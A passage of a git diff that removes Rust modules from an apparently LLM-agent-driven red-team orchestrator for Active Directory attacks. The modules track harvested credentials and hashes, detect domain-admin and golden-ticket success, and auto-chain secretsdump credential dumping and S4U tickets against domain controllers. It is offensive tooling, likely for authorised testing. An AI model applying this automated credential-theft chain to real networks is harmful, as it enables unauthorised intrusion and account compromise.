yet exploited. - pub fn get_unexploited_vulnerabilities(&self) -> Vec<&VulnerabilityInfo> { - let mut vulns: Vec<&VulnerabilityInfo> = self - .state - .discovered_vulnerabilities - .values() - .filter(|v| !self.state.exploited_vulnerabilities.contains(&v.vuln_id)) - .collect(); - vulns.sort_by_key(|v| v.priority); - vulns - } - - /// Get hashes that have not been cracked yet. - pub fn get_uncracked_hashes(&self) -> Vec<&Hash> { - self.state - .all_hashes - .iter() - .filter(|h| h.cracked_password.is_none()) - .collect() - } - - /// Generate a human-readable summary of the recovery state. - pub fn get_resume_summary(&self) -> String { - let mut s = String::new(); - - let _ = writeln!(s, "OPERATION RESUMED AFTER RECOVERY"); - let _ = writeln!(s, "{}", "=".repeat(50)); - let _ = writeln!(s); - let _ = writeln!(s, "Operation ID: {}", self.state.operation_id); - let _ = writeln!(s, "Credentials found: {}", self.state.all_credentials.len()); - let _ = writeln!(s, "Hosts discovered: {}", self.state.all_hosts.len()); - let _ = writeln!( - s, - "Domain admin: {}", - if self.state.has_domain_admin { - "YES" - } else { - "NO" - } - ); - let _ = writeln!(s); - - // Retrying tasks - let retrying = self.get_retrying_tasks(); - if !retrying.is_empty() { - let _ = writeln!(s, "[RETRYING] {} tasks auto-requeued:", retrying.len()); - for task in retrying.iter().take(5) { - let _ = writeln!( - s, - " - {} -> {} (retry {}/{})", - task.task_type, task.assigned_agent, task.retry_count, task.max_retries - ); - } - let _ = writeln!(s); - } - - // Permanently failed tasks - let interrupted = self.get_interrupted_tasks(); - if !interrupted.is_empty() { - let _ = writeln!( - s, - "[FAILED] {} tasks exceeded max retries:", - interrupted.len() - ); - for task in interrupted.iter().take(5) { - let _ = writeln!( - s, - " - {} -> {} (retried {}x)", - task.task_type, task.assigned_agent, task.retry_count - ); - } - let _ = writeln!(s); - } - - // Unexploited vulnerabilities - let unexploited = self.get_unexploited_vulnerabilities(); - if !unexploited.is_empty() { - let _ = writeln!( - s, - "[PENDING] {} unexploited vulnerabilities:", - unexploited.len() - ); - for v in unexploited.iter().take(5) { - let _ = writeln!( - s, - " - {}: {} (priority {})", - v.vuln_type, v.target, v.priority - ); - } - let _ = writeln!(s); - } - - // Uncracked hashes - let uncracked = self.get_uncracked_hashes(); - if !uncracked.is_empty() { - let _ = writeln!(s, "[PENDING] {} uncracked hashes", uncracked.len()); - let _ = writeln!(s); - } - - if retrying.is_empty() && interrupted.is_empty() { - let _ = writeln!(s, "[OK] No interrupted tasks - clean recovery"); - let _ = writeln!(s); - } - - s - } -} diff --git a/ares-orchestrator/src/recovery/types.rs b/ares-orchestrator/src/recovery/types.rs deleted file mode 100644 index cc68ebce..00000000 --- a/ares-orchestrator/src/recovery/types.rs +++ /dev/null @@ -1,127 +0,0 @@ -//! Types and constants for operation recovery. - -use ares_core::models::{SharedRedTeamState, TaskStatus}; - -/// Maximum number of retries before a task is considered permanently failed. -pub const MAX_RETRIES: i32 = 3; - -/// Statuses that indicate an interrupted task eligible for re-enqueue. -pub const INTERRUPTED_STATUSES: &[TaskStatus] = &[ - TaskStatus::Pending, - TaskStatus::InProgress, - TaskStatus::Retrying, -]; - -/// Keywords that signal a transient Redis connection error. -pub const CONNECTION_ERROR_KEYWORDS: &[&str] = &[ - "connection", - "connect", - "closed", - "timeout", - "broken pipe", - "reset", - "reading from", -]; - -/// Maximum number of retry attempts for transient Redis connection errors. -pub const MAX_CONNECTION_RETRIES: u32 = 3; - -/// Check if an error looks like a transient Redis connection failure. -pub fn is_connection_error(err: &anyhow::Error) -> bool { - let msg = err.to_string().to_lowercase(); - CONNECTION_ERROR_KEYWORDS.iter().any(|kw| msg.contains(kw)) -} - -/// Result of a recovery operation. -#[derive(Debug)] -#[allow(dead_code)] -pub struct RecoveredState { - /// The full shared state loaded from Redis. - pub state: SharedRedTeamState, - /// Task IDs that were re-enqueued for retry. - pub requeued_task_ids: Vec, - /// Task IDs that exceeded max retries and were marked failed. - pub failed_task_ids: Vec, -} - -/// Info about a permanently failed task (exceeded max retries). -#[derive(Debug, Clone)] -#[allow(dead_code)] -pub struct InterruptedTask { - pub task_id: String, - pub task_type: String, - pub assigned_agent: String, - pub retry_count: i32, - pub error: String, -} - -/// Info about a task that was auto-requeued for retry. -#[derive(Debug, Clone)] -#[allow(dead_code)] -pub struct RetryingTask { - pub task_id: String, - pub task_type: String, - pub assigned_agent: String, - pub retry_count: i32, - pub max_retries: i32, -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_is_connection_error_connection() { - let err = anyhow::anyhow!("Redis connection refused"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_timeout() { - let err = anyhow::anyhow!("Operation timeout after 30s"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_broken_pipe() { - let err = anyhow::anyhow!("Broken pipe while writing"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_reset() { - let err = anyhow::anyhow!("Connection reset by peer"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_closed() { - let err = anyhow::anyhow!("Socket closed unexpectedly"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_connection_error_case_insensitive() { - let err = anyhow::anyhow!("TIMEOUT waiting for response"); - assert!(is_connection_error(&err)); - } - - #[test] - fn test_is_not_connection_error() { - let err = anyhow::anyhow!("Key not found in Redis"); - assert!(!is_connection_error(&err)); - } - - #[test] - fn test_is_not_connection_error_parse() { - let err = anyhow::anyhow!("Failed to parse JSON response"); - assert!(!is_connection_error(&err)); - } - - #[test] - fn test_constants() { - assert_eq!(MAX_RETRIES, 3); - assert_eq!(MAX_CONNECTION_RETRIES, 3); - assert_eq!(INTERRUPTED_STATUSES.len(), 3); - } -} diff --git a/ares-orchestrator/src/result_processing/admin_checks.rs b/ares-orchestrator/src/result_processing/admin_checks.rs deleted file mode 100644 index 7d4179ad..00000000 --- a/ares-orchestrator/src/result_processing/admin_checks.rs +++ /dev/null @@ -1,328 +0,0 @@ -//! Domain admin indicator checks, golden ticket detection, Pwn3d! credential -//! upgrades, and domain SID extraction. - -use std::sync::Arc; - -use serde_json::Value; -use tracing::{info, warn}; - -use super::parsing::has_domain_admin_indicator; -use crate::dispatcher::Dispatcher; - -/// Check result for domain admin indicators and update state. -pub(crate) async fn check_domain_admin_indicators(payload: &Value, dispatcher: &Arc) { - if !has_domain_admin_indicator(payload) { - return; - } - let already_da = { - let state = dispatcher.state.read().await; - state.has_domain_admin - }; - let path = if payload.get("has_domain_admin").and_then(|v| v.as_bool()) == Some(true) { - payload - .get("domain_admin_path") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - } else { - Some("secretsdump -> krbtgt hash".to_string()) - }; - if let Err(e) = dispatcher - .state - .set_domain_admin(&dispatcher.queue, path.clone()) - .await - { - warn!(err = %e, "Failed to set domain admin flag"); - } else { - info!("Domain Admin achieved!"); - } - if !already_da { - let (domain, dc_target) = { - let state = dispatcher.state.read().await; - let domain = state.domains.first().cloned().unwrap_or_default(); - let dc = state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned() - .unwrap_or_else(|| domain.clone()); - (domain, dc) - }; - if !domain.is_empty() { - let vuln_id = format!("domain_admin_{}", domain.to_lowercase()); - let mut details = std::collections::HashMap::new(); - details.insert("domain".into(), serde_json::Value::String(domain.clone())); - if let Some(ref p) = path { - details.insert("path".into(), serde_json::Value::String(p.clone())); - } - details.insert( - "note".into(), - serde_json::Value::String( - "Domain admin achieved via agent-reported indicator".to_string(), - ), - ); - let vuln = ares_core::models::VulnerabilityInfo { - vuln_id: vuln_id.clone(), - vuln_type: "domain_admin".to_string(), - target: dc_target, - discovered_by: "result_processing".to_string(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: String::new(), - priority: 1, - }; - let _ = dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await; - let _ = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await; - } - } -} - -pub(crate) async fn check_golden_ticket_completion( - payload: &Value, - task_id: &str, - dispatcher: &Arc, -) { - if !task_id.contains("exploit") && !task_id.contains("golden") { - return; - } - { - let state = dispatcher.state.read().await; - if state.has_golden_ticket { - return; - } - } - let mut found_ticket = false; - let mut domain = String::new(); - if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for item in arr { - let text = item - .as_str() - .or_else(|| item.get("output").and_then(|v| v.as_str())) - .unwrap_or(""); - if text.contains("Saving ticket in") && text.contains(".ccache") { - found_ticket = true; - break; - } - } - } - if !found_ticket { - for key in &["tool_output", "output", "summary"] { - if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { - if text.contains("Saving ticket in") && text.contains(".ccache") { - found_ticket = true; - break; - } - } - } - } - if !found_ticket && payload.get("has_golden_ticket").and_then(|v| v.as_bool()) == Some(true) { - found_ticket = true; - } - if !found_ticket { - return; - } - if let Some(d) = payload.get("domain").and_then(|v| v.as_str()) { - domain = d.to_string(); - } - if domain.is_empty() { - let state = dispatcher.state.read().await; - domain = state.domains.first().cloned().unwrap_or_default(); - } - if let Err(e) = dispatcher - .state - .set_golden_ticket(&dispatcher.queue, &domain) - .await - { - warn!(err = %e, "Failed to set golden ticket flag"); - } -} - -pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: &Arc) { - for line in text.lines() { - if !line.contains("Pwn3d!") || !line.contains("[+]") { - continue; - } - if let Some(after_plus) = line.split("[+]").nth(1) { - let after_plus = after_plus.trim(); - if let Some(backslash) = after_plus.find('\\') { - let domain_part = after_plus[..backslash].trim(); - let rest = &after_plus[backslash + 1..]; - let username = if let Some(colon) = rest.find(':') { - &rest[..colon] - } else { - rest.split_whitespace().next().unwrap_or("") - }; - let username = username.trim(); - let domain = domain_part.to_lowercase(); - if username.is_empty() || domain.is_empty() { - continue; - } - info!(username = %username, domain = %domain, "Pwn3d! detected -- upgrading credential to admin"); - let upgraded = { - let mut state = dispatcher.state.write().await; - let mut found = false; - for cred in state.credentials.iter_mut() { - if cred.username.to_lowercase() == username.to_lowercase() - && cred.domain.to_lowercase() == domain - && !cred.is_admin - { - cred.is_admin = true; - found = true; - } - } - found - }; - if upgraded { - let pwned_ip = line - .split_whitespace() - .find(|w| { - w.split('.').count() == 4 - && w.split('.').all(|o| o.parse::().is_ok()) - }) - .map(|s| s.to_string()); - info!( - username = %username, - domain = %domain, - pwned_host = ?pwned_ip, - "Credential upgraded to admin -- dispatching priority secretsdump" - ); - let work: Vec<(String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - let dc_ips: Vec = - state.domain_controllers.values().cloned().collect(); - let mut targets: Vec = dc_ips; - if let Some(ref ip) = pwned_ip { - if !targets.contains(ip) { - targets.push(ip.clone()); - } - } - state - .credentials - .iter() - .filter(|c| { - c.username.to_lowercase() == username.to_lowercase() - && c.domain.to_lowercase() == domain - && c.is_admin - }) - .flat_map(|cred| { - targets - .iter() - .map(|ip| (ip.clone(), cred.clone())) - .collect::>() - }) - .collect() - }; - for (target_ip, cred) in work { - match dispatcher.request_secretsdump(&target_ip, &cred, 1).await { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - target = %target_ip, - username = %username, - "Admin Pwn3d! secretsdump dispatched (priority 1)" - ); - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch Pwn3d! secretsdump"), - } - } - } - } - } - } -} - -pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &Arc) { - let mut text_parts: Vec<&str> = Vec::new(); - for key in &["tool_output", "output"] { - if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for item in arr { - if let Some(s) = item.as_str() { - text_parts.push(s); - } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - } - if text_parts.is_empty() { - return; - } - let combined = text_parts.join("\n"); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&combined) { - let domain = payload - .get("domain") - .and_then(|v| v.as_str()) - .map(|d| d.to_lowercase()) - .filter(|d| !d.is_empty()); - let domain = match domain { - Some(d) => d, - None => { - let state = dispatcher.state.read().await; - match state.domains.first() { - Some(d) => d.to_lowercase(), - None => return, - } - } - }; - let already_cached = { - let state = dispatcher.state.read().await; - state - .domain_sids - .get(&domain) - .map(|s| s == &sid) - .unwrap_or(false) - }; - if !already_cached { - let op_id = { - let state = dispatcher.state.read().await; - state.operation_id.clone() - }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { - warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); - } else { - info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); - dispatcher - .state - .write() - .await - .domain_sids - .insert(domain.clone(), sid); - } - } - if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { - let already_known = { - let state = dispatcher.state.read().await; - state.admin_names.contains_key(&domain) - }; - if !already_known { - let op_id = { - let state = dispatcher.state.read().await; - state.operation_id.clone() - }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { - warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); - } else { - info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); - dispatcher - .state - .write() - .await - .admin_names - .insert(domain, admin_name); - } - } - } - } -} diff --git a/ares-orchestrator/src/result_processing/discovery_polling.rs b/ares-orchestrator/src/result_processing/discovery_polling.rs deleted file mode 100644 index 68c7ba03..00000000 --- a/ares-orchestrator/src/result_processing/discovery_polling.rs +++ /dev/null @@ -1,190 +0,0 @@ -//! Background discovery polling. - -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use redis::AsyncCommands; -use serde_json::Value; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use ares_core::models::{Credential, Hash, Host, Share, User, VulnerabilityInfo}; - -use super::parsing::resolve_parent_id; -use super::LOCKOUT_PATTERNS; -use crate::dispatcher::Dispatcher; - -pub async fn discovery_poller(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(5)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - if let Err(e) = poll_discoveries(&dispatcher).await { - debug!(err = %e, "Discovery poll error"); - } - } -} - -async fn poll_discoveries(dispatcher: &Dispatcher) -> Result<()> { - let key = dispatcher.state.discovery_key().await; - let mut conn = dispatcher.queue.connection(); - let discoveries: Vec = conn.lrange(&key, 0, -1).await.unwrap_or_default(); - if discoveries.is_empty() { - return Ok(()); - } - let _: () = conn.del(&key).await?; - info!( - count = discoveries.len(), - "Processing real-time discoveries" - ); - for json_str in &discoveries { - let discovery: Value = match serde_json::from_str(json_str) { - Ok(v) => v, - Err(e) => { - warn!(err = %e, "Bad discovery JSON"); - continue; - } - }; - let disc_type = discovery - .get("type") - .and_then(|v| v.as_str()) - .unwrap_or("unknown"); - let data = match discovery.get("data") { - Some(d) => d, - None => continue, - }; - let input_username = discovery.get("input_username").and_then(|v| v.as_str()); - let input_domain = discovery.get("input_domain").and_then(|v| v.as_str()); - match disc_type { - "credential" => match serde_json::from_value::(data.clone()) { - Ok(mut cred) => { - if cred.parent_id.is_none() { - let state = dispatcher.state.read().await; - let (pid, step) = resolve_parent_id( - &state.credentials, - &state.hashes, - &cred.source, - &cred.username, - &cred.domain, - input_username, - input_domain, - ); - cred.parent_id = pid; - cred.attack_step = step; - drop(state); - } - let user_domain = format!("{}@{}", cred.username, cred.domain); - match dispatcher - .state - .publish_credential(&dispatcher.queue, cred) - .await - { - Ok(true) => { - info!(credential = %user_domain, "Discovery: credential published") - } - Ok(false) => { - debug!(credential = %user_domain, "Discovery: credential already known") - } - Err(e) => { - warn!(err = %e, credential = %user_domain, "Failed to publish discovered credential") - } - } - } - Err(e) => warn!(err = %e, "Failed to deserialize credential discovery"), - }, - "hash" => { - if let Ok(mut hash) = serde_json::from_value::(data.clone()) { - if hash.parent_id.is_none() { - let state = dispatcher.state.read().await; - let (pid, step) = resolve_parent_id( - &state.credentials, - &state.hashes, - &hash.source, - &hash.username, - &hash.domain, - input_username, - input_domain, - ); - hash.parent_id = pid; - hash.attack_step = step; - drop(state); - } - let _ = dispatcher.state.publish_hash(&dispatcher.queue, hash).await; - } - } - "vulnerability" | "delegation" => { - if let Ok(vuln) = serde_json::from_value::(data.clone()) { - let _ = dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await; - } - } - "host" => match serde_json::from_value::(data.clone()) { - Ok(host) => { - let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; - } - Err(e) => { - warn!(err = %e, data = %data, "Failed to deserialize host discovery"); - } - }, - "share" => { - if let Ok(share) = serde_json::from_value::(data.clone()) { - let _ = dispatcher - .state - .publish_share(&dispatcher.queue, share) - .await; - } - } - "user" => { - if let Ok(user) = serde_json::from_value::(data.clone()) { - if ["kerberos_enum", "netexec_user_enum"].contains(&user.source.as_str()) { - let _ = dispatcher.state.publish_user(&dispatcher.queue, user).await; - } - } - } - other => { - debug!(disc_type = other, "Unknown discovery type, ignoring"); - } - } - } - dispatcher.credential_access_notify.notify_waiters(); - dispatcher.delegation_notify.notify_waiters(); - let _ = dispatcher.notify_state_update().await; - Ok(()) -} - -/// Check if a task result contains lockout error indicators. -pub(crate) fn has_lockout_in_result(result: &crate::task_queue::TaskResult) -> bool { - if let Some(ref err) = result.error { - if LOCKOUT_PATTERNS.iter().any(|p| err.contains(p)) { - return true; - } - } - if let Some(ref payload) = result.result { - if let Some(outputs) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for output in outputs { - if let Some(text) = output.as_str() { - if LOCKOUT_PATTERNS.iter().any(|p| text.contains(p)) { - return true; - } - } - } - } - for key in &["summary", "output", "tool_output"] { - if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { - if LOCKOUT_PATTERNS.iter().any(|p| text.contains(p)) { - return true; - } - } - } - } - false -} diff --git a/ares-orchestrator/src/result_processing/mod.rs b/ares-orchestrator/src/result_processing/mod.rs deleted file mode 100644 index b871f245..00000000 --- a/ares-orchestrator/src/result_processing/mod.rs +++ /dev/null @@ -1,611 +0,0 @@ -//! Result processing and discovery polling. -//! -//! Handles completed task results: extracts discovered credentials, hashes, -//! hosts, and vulnerabilities from result payloads and publishes them to -//! shared state and Redis. -//! -//! Also polls the `ares:discoveries:{op_id}` LIST for real-time worker -//! discoveries that arrive outside the task result flow. - -pub mod admin_checks; -pub mod discovery_polling; -pub mod parsing; -#[cfg(test)] -mod tests; -pub mod timeline; - -// Re-exports consumed by callers outside this module -pub use discovery_polling::discovery_poller; - -use std::sync::Arc; - -use anyhow::Result; -use serde_json::Value; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::output_extraction; -use crate::results::CompletedTask; -use crate::throttling::Throttler; - -use self::admin_checks::{ - check_domain_admin_indicators, check_golden_ticket_completion, - detect_and_upgrade_admin_credentials, extract_and_cache_domain_sid, -}; -use self::discovery_polling::has_lockout_in_result; -use self::parsing::{parse_discoveries, resolve_parent_id}; -use self::timeline::{create_credential_timeline_event, create_hash_timeline_event}; - -/// Kerberos/SMB errors that indicate a credential is locked out. -pub(crate) const LOCKOUT_PATTERNS: &[&str] = - &["KDC_ERR_CLIENT_REVOKED", "STATUS_ACCOUNT_LOCKED_OUT"]; - -/// Process a completed task result: extract discoveries and update state. -pub async fn process_completed_task( - completed: &CompletedTask, - dispatcher: &Arc, - throttler: &Throttler, -) { - let task_id = &completed.task_id; - let result = &completed.result; - - let cred_key = { - let state = dispatcher.state.read().await; - state - .pending_tasks - .get(task_id.as_str()) - .and_then(|t| t.params.get("credential_key")) - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }; - - { - let core_result = ares_core::models::TaskResult { - task_id: task_id.clone(), - success: result.success, - result: result.result.clone(), - error: result.error.clone(), - completed_at: result.completed_at.unwrap_or_else(chrono::Utc::now), - }; - let _ = dispatcher - .state - .complete_task(&dispatcher.queue, task_id, core_result) - .await; - } - - if result.success { - info!( - task_id = %task_id, - agent = result.agent_name.as_deref().unwrap_or("unknown"), - "Task completed successfully" - ); - throttler.clear_rate_limit_error().await; - } else { - let err_msg = result.error.as_deref().unwrap_or("unknown error"); - warn!(task_id = %task_id, err = err_msg, "Task failed"); - - if err_msg.to_lowercase().contains("rate limit") || err_msg.to_lowercase().contains("429") { - throttler.record_rate_limit_error().await; - } - // Don't return early — failed tasks (MaxSteps, Error) may still carry - // parser-extracted discoveries from tool calls that ran before failure. - // All discoveries now come from regex parsers, not LLM hallucination. - } - - // Extract discoveries ONLY from the "discoveries" key — populated exclusively - // by ares-tools parsers in submission.rs. The top-level payload is LLM-generated - // and must never be fed into parse_discoveries() (hallucination risk). - if let Some(ref payload) = result.result { - if let Some(disc) = payload.get("discoveries") { - if let Err(e) = extract_discoveries(disc, dispatcher).await { - warn!(task_id = %task_id, err = %e, "Failed to extract parser discoveries"); - } - check_domain_admin_indicators(disc, dispatcher).await; - } - } - - // Secondary pass: regex-based extraction from raw text in the result. - // This catches discoveries that the per-tool parsers or LLM may have missed. - if let Some(ref payload) = result.result { - let default_domain = get_default_domain(dispatcher).await; - extract_from_raw_text(payload, dispatcher, &default_domain).await; - } - - // Domain SID extraction: scan raw text for S-1-5-21-... patterns (from secretsdump). - // Caches the SID for golden ticket generation without needing lookupsid. - if let Some(ref payload) = result.result { - extract_and_cache_domain_sid(payload, dispatcher).await; - } - - // S4U auto-chain: detect .ccache in output and dispatch secretsdump with ticket. - // Mirrors Python's _auto_chain_s4u_lateral_movement — when a task produces a - // Kerberos ticket (.ccache), chain a secretsdump using that ticket for - // immediate credential extraction. - if let Some(ref payload) = result.result { - auto_chain_s4u_secretsdump(payload, dispatcher, &completed.task_id).await; - } - - if result.success { - if let Some(ref payload) = result.result { - check_golden_ticket_completion(payload, &completed.task_id, dispatcher).await; - } - } - - if result.success { - if let Some(vuln_id) = completed - .task_id - .starts_with("exploit_") - .then(|| { - result - .result - .as_ref() - .and_then(|r| r.get("vuln_id")) - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }) - .flatten() - { - info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); - if let Err(e) = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await - { - warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); - } - } - } - - if let Some(ref key) = cred_key { - if has_lockout_in_result(result) { - if let Some((username, domain)) = key.split_once('@') { - warn!( - credential = %key, - task_id = %task_id, - "Credential quarantined for 5 min: lockout detected" - ); - dispatcher - .state - .write() - .await - .quarantine_credential(username, domain); - } - } - } - - dispatcher.credential_access_notify.notify_waiters(); - dispatcher.delegation_notify.notify_waiters(); - - let _ = dispatcher.notify_state_update().await; -} - -/// Get the default domain from state (first domain, or empty string). -async fn get_default_domain(dispatcher: &Arc) -> String { - let state = dispatcher.state.read().await; - state.domains.first().cloned().unwrap_or_default() -} - -/// S4U auto-chain: detect .ccache ticket in task output and dispatch secretsdump. -/// -/// Mirrors Python's `_auto_chain_s4u_lateral_movement` — when a task produces a -/// Kerberos ticket file (.ccache), automatically dispatch a secretsdump task using -/// that ticket. This chains S4U/delegation → secretsdump without waiting for the -/// next automation cycle. -async fn auto_chain_s4u_secretsdump(payload: &Value, dispatcher: &Arc, task_id: &str) { - // Collect ONLY raw tool output fields — never LLM-generated summaries. - let mut text_parts: Vec<&str> = Vec::new(); - for key in &["tool_output", "output"] { - if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for item in arr { - if let Some(s) = item.as_str() { - text_parts.push(s); - } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - } - - let combined = text_parts.join("\n"); - let ticket_path = match ares_llm::routing::extract_ticket_path(&combined) { - Some(p) => p, - None => return, // No .ccache found - }; - - info!( - task_id = %task_id, - ticket_path = %ticket_path, - "Detected .ccache ticket — chaining secretsdump" - ); - - // Try to extract target from the task params (target_spn → host) or ccache filename - let target_ip = payload - .get("target_spn") - .and_then(|v| v.as_str()) - .and_then(ares_llm::routing::extract_host_from_spn) - .or_else(|| { - // Try to parse target from ccache filename: - // Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache - let fname = ticket_path.rsplit('/').next().unwrap_or(&ticket_path); - if let Some(at_pos) = fname.find('@') { - let after = &fname[at_pos + 1..]; - // Extract hostname: cifs_dc01.contoso.local@REALM.ccache - let host_part = after.split('@').next().unwrap_or(after).replace('_', "."); - // Remove the service prefix (cifs. → dc01.contoso.local) - if let Some(dot_pos) = host_part.find('.') { - let candidate = &host_part[dot_pos + 1..]; - if candidate.contains('.') { - return Some(candidate.to_string()); - } - } - } - None - }) - .or_else(|| { - // Fallback: use target_ip from the task payload - payload - .get("target_ip") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }) - .or_else(|| { - payload - .get("target") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }); - - let target_ip = match target_ip { - Some(ip) => ip, - None => { - warn!(task_id = %task_id, "S4U auto-chain: .ccache found but no target could be determined"); - return; - } - }; - - // Resolve target IP if it's a hostname - let resolved_ip = { - let state = dispatcher.state.read().await; - // Check if target_ip is actually an IP already - if target_ip.parse::().is_ok() { - target_ip.clone() - } else { - // It's a hostname — look up in hosts - state - .hosts - .iter() - .find(|h| h.hostname.to_lowercase() == target_ip.to_lowercase()) - .map(|h| h.ip.clone()) - .unwrap_or(target_ip.clone()) - } - }; - - let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); - - // Dispatch secretsdump with ticket (no password needed). - // Must include username — secretsdump requires it even with -k -no-pass. - // The S4U impersonates Administrator, so use that as default. - let username = payload - .get("impersonate") - .and_then(|v| v.as_str()) - .unwrap_or("Administrator"); - let sd_payload = serde_json::json!({ - "technique": "secretsdump", - "techniques": ["secretsdump"], - "target_ip": resolved_ip, - "username": username, - "domain": domain, - "ticket_path": ticket_path, - "no_pass": true, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", sd_payload, 2) - .await - { - Ok(Some(new_task_id)) => { - info!( - parent_task = %task_id, - chained_task = %new_task_id, - target = %resolved_ip, - ticket = %ticket_path, - "S4U auto-chain: secretsdump dispatched with ticket" - ); - } - Ok(None) => {} - Err(e) => warn!(err = %e, "S4U auto-chain: failed to dispatch secretsdump"), - } -} - -/// Extract discoveries from raw text fields in the result payload. -/// -/// Collects text from raw tool output fields ("tool_output", "output", "tool_outputs") -/// and runs regex-based extraction on the combined text. This mirrors Python's -/// `_process_output_text()` — a safety net that catches discoveries the per-tool -/// parsers or LLM-reported structured data may have missed. -async fn extract_from_raw_text( - payload: &Value, - dispatcher: &Arc, - default_domain: &str, -) { - // Only parse tool_outputs — actual tool stdout collected by the agent loop. - // The result payload's "summary", "result", and "output" fields are all - // LLM-generated prose and MUST NOT be fed into regex extractors (they produce - // false positives like "Password : only" from conversational text). - // - // Structured discoveries from tool-call parsers are already handled by - // extract_discoveries() via the "discoveries" key — this pass is a secondary - // safety net for raw tool stdout that parsers may have missed. - let mut text_parts: Vec<&str> = Vec::new(); - - if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for item in arr { - if let Some(s) = item.as_str() { - text_parts.push(s); - } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - } - - if text_parts.is_empty() { - return; - } - - // Process each tool output independently to prevent stateful parsers - // (e.g. extract_plaintext_passwords's current_user tracker) from leaking - // context across unrelated tool calls — a joined string caused false - // credential attribution (e.g. john.smith:Summer2025 from stale context). - let mut extracted = output_extraction::TextExtractions::default(); - for part in &text_parts { - let partial = output_extraction::extract_from_output_text(part, default_domain); - extracted.credentials.extend(partial.credentials); - extracted.hashes.extend(partial.hashes); - extracted.hosts.extend(partial.hosts); - extracted.users.extend(partial.users); - extracted.shares.extend(partial.shares); - } - - if extracted.is_empty() { - return; - } - - let mut new_count = 0usize; - - for cred in extracted.credentials { - let is_cracked = cred.source.starts_with("cracked:"); - let cracked_username = cred.username.clone(); - let cracked_domain = cred.domain.clone(); - let cracked_password = cred.password.clone(); - match dispatcher - .state - .publish_credential(&dispatcher.queue, cred) - .await - { - Ok(true) => { - new_count += 1; - // When a cracked credential is published, update the corresponding - // hash's cracked_password field in state and Redis. - if is_cracked { - let _ = dispatcher - .state - .update_hash_cracked_password( - &dispatcher.queue, - &cracked_username, - &cracked_domain, - &cracked_password, - ) - .await; - } - } - Ok(false) => {} // duplicate - Err(e) => warn!(err = %e, "Failed to publish text-extracted credential"), - } - } - - for hash in extracted.hashes { - match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { - Ok(true) => new_count += 1, - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish text-extracted hash"), - } - } - - for host in extracted.hosts { - let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; - } - - // Users intentionally NOT published from raw text extraction. - // The DOMAIN\user regex matches every wordlist entry in kerbrute/ASREProast - // output (e.g. "[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set"). - // Only per-tool parsers (kerberos_enum, netexec_user_enum) produce verified - // users gated by KDC response patterns. - - for share in extracted.shares { - match dispatcher - .state - .publish_share(&dispatcher.queue, share) - .await - { - Ok(true) => new_count += 1, - Ok(false) => {} - 